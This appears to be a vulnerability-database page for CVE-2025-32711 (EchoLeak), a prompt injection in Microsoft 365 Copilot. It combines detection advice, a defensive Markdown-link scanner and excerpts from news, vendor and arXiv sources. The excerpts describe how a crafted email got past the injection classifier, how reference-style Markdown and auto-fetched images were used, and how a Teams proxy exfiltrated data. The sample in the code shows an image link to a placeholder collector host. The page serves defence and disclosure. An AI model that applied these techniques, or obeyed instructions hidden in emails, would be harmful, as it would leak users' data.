CVE-2025-32711
published 2025-06-11
CVE-2025-32711: AI command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.
Priority: P3 · 54 · high · 7.5 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
EPSS: 5.78% (92.2th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | microsoft_365_copilot | — | — |
| msrc | microsoft_365_copilot | — | — |
Detection & IOCs
- Inspect Copilot prompt and response traffic for reference-style Markdown link patterns that may be used to bypass link redaction controls and smuggle exfiltration URLs.
- Alert on Copilot responses that include outbound requests to Microsoft Teams proxy endpoints not initiated by direct user action, as this was the exfiltration channel leveraged in EchoLeak.
- Use NLP-based email intent analysis to flag emails whose content, when parsed as instructions, would direct an AI assistant to exfiltrate data, even if the email appears benign to human readers.
- Monitor for XPIA (Cross Prompt Injection Attempt) classifier evasion patterns in emails processed by M365 Copilot, as EchoLeak specifically chained bypasses of Microsoft's XPIA classifier.
- Microsoft patched EchoLeak server-side in May 2025; no customer action is required for the patch itself, but configuration hardening is still recommended.
- Disabling external email context in Copilot settings is a recommended mitigation to reduce the RAG attack surface for this class of prompt injection.
- Restricting markdown rendering in AI outputs reduces the prompt injection risk surface, particularly for reference-style Markdown link exfiltration.
- Existing defenses (e.g., retrieval filtering) are insufficient to prevent retrieval of optimized malicious text; adaptive attack variants can bypass them.
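One way to implement the first and seventh items above, as an added example that is not code from this page, Microsoft, or any cited source: it resolves reference-style Markdown links and images in an assistant response to their definitions, flags targets outside an allowlist, and offers a sanitizer that reduces them to plain text. `ALLOWED_HOSTS`, the function names and the sample response are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts your tenant treats as internal; everything else is external.
ALLOWED_HOSTS = {"contoso.sharepoint.com"}

# Reference definition:  [label]: <url> "optional title"  (up to 3 leading spaces)
REF_DEF = re.compile(r'^ {0,3}\[([^\]]+)\]:\s*<?(\S+?)>?(?:\s+["\'(].*)?$', re.M)
# Reference usage: [text][label] or ![alt][label]; an empty label reuses the text
REF_USE = re.compile(r'(!?)\[([^\]]+)\]\[([^\]]*)\]')

def norm(label):
    """Markdown reference labels match case-insensitively, whitespace collapsed."""
    return " ".join(label.lower().split())

def find_reference_links(text):
    """Return one finding per reference-style link/image that resolves to a URL."""
    defs = {norm(m.group(1)): m.group(2) for m in REF_DEF.finditer(text)}
    findings = []
    for m in REF_USE.finditer(text):
        label = norm(m.group(3) or m.group(2))
        url = defs.get(label)
        if url is None:
            continue  # unresolved reference: a renderer shows it as plain text
        parts = urlsplit(url)
        findings.append({
            "kind": "image" if m.group(1) else "link",  # images are auto-fetched
            "label": label,
            "url": url,
            "external": (parts.hostname or "").lower() not in ALLOWED_HOSTS,
            "has_query": bool(parts.query),
        })
    return findings

def strip_reference_links(text):
    """Mitigation: drop definitions and reduce usages to their visible text."""
    text = REF_DEF.sub("", text)
    return REF_USE.sub(lambda m: m.group(2), text)

# Constructed sample response, not captured traffic.
SAMPLE = (
    "Here is the summary you asked for.\n"
    "![status][r1] See also [the policy page][Docs].\n\n"
    "[r1]: https://collector.example.invalid/p.png?d=PLACEHOLDER\n"
    "[docs]: https://contoso.sharepoint.com/sites/policy\n"
)
```

A finding with `kind == "image"` and `external` set is the highest-priority case for review, since images are fetched on render without a click.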
CVSS provenance
nvd · v3.1 · 7.5 HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vendor_msrc · 9.3 CRITICAL
GHSA
GHSA-h2w9-p5qf-qmrh: AI command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network
ghsa_unreviewed·2025-06-11
CVE-2025-32711 [CRITICAL] CWE-74
Microsoft
M365 Copilot Information Disclosure Vulnerability
vendor_msrc·2025-06-10·CVSS 9.3
CVE-2025-32711 [CRITICAL] CWE-74 M365 Copilot Information Disclosure Vulnerability
Description: AI command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.
FAQ: Why are there no links to an update or instructions with steps that must be taken to protect from this vulnerability?
This vulnerability has already been fully mitigated by Microsoft. There is no action for users of this service to take. The purpose of this CVE is to provide further transparency.
Please see Toward greater transparency: Unveiling Cloud Service CVEs for more information.
Customer Action Required: No
Impact: Information Disclosure
Exploit Status: Publicly Disclosed: No; Exploited: No; Latest Software Release: Exploitation Less Likely
No detection rules found.
No public exploits indexed.
Hackernews
One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
blogs_hackernews·2026-06-15·CVSS 7.5
CVE-2026-42824 [HIGH] One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
## One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
A single click on a trusted Microsoft link could have let an attacker pull emails, calendar details, and indexed files out of Microsoft 365 Copilot Enterprise Search.
Researchers at Varonis Threat Labs chained three bugs into a one-click exfiltration path they call SearchLeak. Because the link pointed to a real microsoft.com domain, traditional anti-phishing and URL filtering tools were unlikely to flag it.
No prompt, no password, no second click. Microsoft assigned CVE-2026-42824 and marked it critical; the CVSS scores ran low
Trendmicro
Preventing Zero-Click AI Threats: Insights from EchoLeak
blogs_trendmicro·2025-07-15·CVSS 9.3
CVE-2025-32711 [CRITICAL] Preventing Zero-Click AI Threats: Insights from EchoLeak
Artificial Intelligence (AI)
## Preventing Zero-Click AI Threats: Insights from EchoLeak
A zero-click exploit called EchoLeak reveals how AI assistants like Microsoft 365 Copilot can be manipulated to leak sensitive data without user interaction. This entry breaks down how the attack works, why it matters, and what defenses are available to proactively mitigate this emerging AI-native threat.
By: Trend Micro, Jul 15, 2025
EchoLeak (CVE-2025-32711) is a recently discovered vulnerability in Microsoft 365 Copilot, made more nefarious by its zero-click nature, meaning it requires no user interaction to succeed. It demonstrates how helpful systems can open the door to entirely new forms of attack—no malware, no phishing required—just the unquestioning ob
## Key Takeaways
- EchoLeak is a zero-click AI vulnerability that exploits Copilot’s use of historical contextual data to silently execute hidden prompts without user interaction.
- The attack method relies on embedded invisible prompt injection—such as HTML comments or white-on-white text—designed to hijack GenAI interpretation at a l
arXiv
AgentSentry: Mitigating Indirect Prompt Injection in LLM Agents via Temporal Causal Diagnostics and Context Purification
arxiv_fulltext·2026-02-26
Tian Zhang^1, Yiwei Xu^1, Juan Wang^1*, Keyan Guo^2, Xiaoyang Xu^1, Bowen Xiao^1, Quanlong Guan^3, Jinlin Fan^1, Jiawei Liu^1, Zhiquan Liu^4, Hongxin Hu^2
^1 Key Laboratory of Aerospace Information Security and Trusted Computing, Ministry of Education, School of Cyber Science and Engineering, Wuhan University, Wuhan 430072, China
^2 Department of Computer Science and Engineering, University at Buffalo, SUNY
^3 Department of Computer Science, College of Information Science and Technology, Jinan University, Guangzhou 510632, China
^4 College of Cyber Security, Jinan University, Guangzhou 510632, China
{tianzhang2025, yiweix, jwang, xiaoyangx, bwxiao, mmdx_t}@whu.edu.cn
arXiv
Human Society-Inspired Approaches to Agentic AI Security: The 4C Framework
arxiv_fulltext·2026-02-02
Alsharif Abuadbba (CSIRO's Data61, Australia)
Nazatul Sultan (CSIRO's Data61, Australia)
Surya Nepal (CSIRO's Data61, Australia)
Sanjay Jha (University of New South Wales, Sydney, Australia)
CCS Concepts: Security and privacy → Security services
AI is moving from domain-specific autonomy in closed, predictable settings to large-language-model-driven agents that plan and act in open, cross-organizational environments. As a result, the cybersecurity risk landscape is changing in fundamental ways. Agentic AI systems can plan, act, collaborate, and persist over
arXiv
Overcoming the Retrieval Barrier: Indirect Prompt Injection in the Wild for LLM Systems
arxiv_fulltext·2026-01-11
Hongyan Chang, Ergute Bao, Xinjian Luo (corresponding author), Ting Yu
Mohamed bin Zayed University of Artificial Intelligence
## Abstract
Large language models (LLMs) increasingly rely on retrieving information from external corpora. This creates a new attack surface: indirect prompt injection (IPI), where hidden instructions are planted in the corpora and hijack model behavior once retrieved. Previous studies have highlighted this risk but often avoid the hardest step: ensuring that malicious content is actually retrieved. In practice, unoptimized IPI is rarely retrieved under natural queries, which leaves its real-world impact unclear.
We address this challenge by decomposing the malicious content into a that guarantees retrieval and an that encodes arbitrary attack objectives. Based
arXiv
Securing the Model Context Protocol (MCP): Risks, Controls, and Governance
arxiv_fulltext·2025-11-25
Herman Errico (Vanta), Jiquan Ngiam (MintMCP), Shanita Sojan (Darktrace)
## Abstract
The Model Context Protocol (MCP) replaces static, developer-controlled API integrations with more dynamic, user-driven agent systems, which also introduces new security risks. As MCP adoption grows across community servers and major platforms, organizations encounter threats that existing AI governance frameworks (such as NIST AI RMF and ISO/IEC 42001) do not yet cover in detail. We focus on three types of adversaries that take advantage of MCP’s flexibility: content-injection attackers that embed malicious instructions into otherwise legitim
arXiv
EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
arxiv_fulltext·2025-09-06·CVSS 9.3
CVE-2025-32711 [CRITICAL] EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
## Abstract
Large language model (LLM) assistants are increasingly integrated into enterprise workflows, raising new security concerns as they bridge internal and external data sources. This paper presents an in-depth case study of EchoLeak (CVE-2025-32711), a zero-click prompt injection vulnerability in Microsoft 365 Copilot that enabled remote, unauthenticated data exfiltration via a single crafted email. By chaining multiple bypasses (evading Microsoft’s XPIA (Cross Prompt Injection Attempt) classifier, circumventing link redaction with reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy allowed by the content security policy), EchoLeak achieved full privilege escalation across LLM trust boundaries without user interaction. We analyze why existi
Published 2025-06-11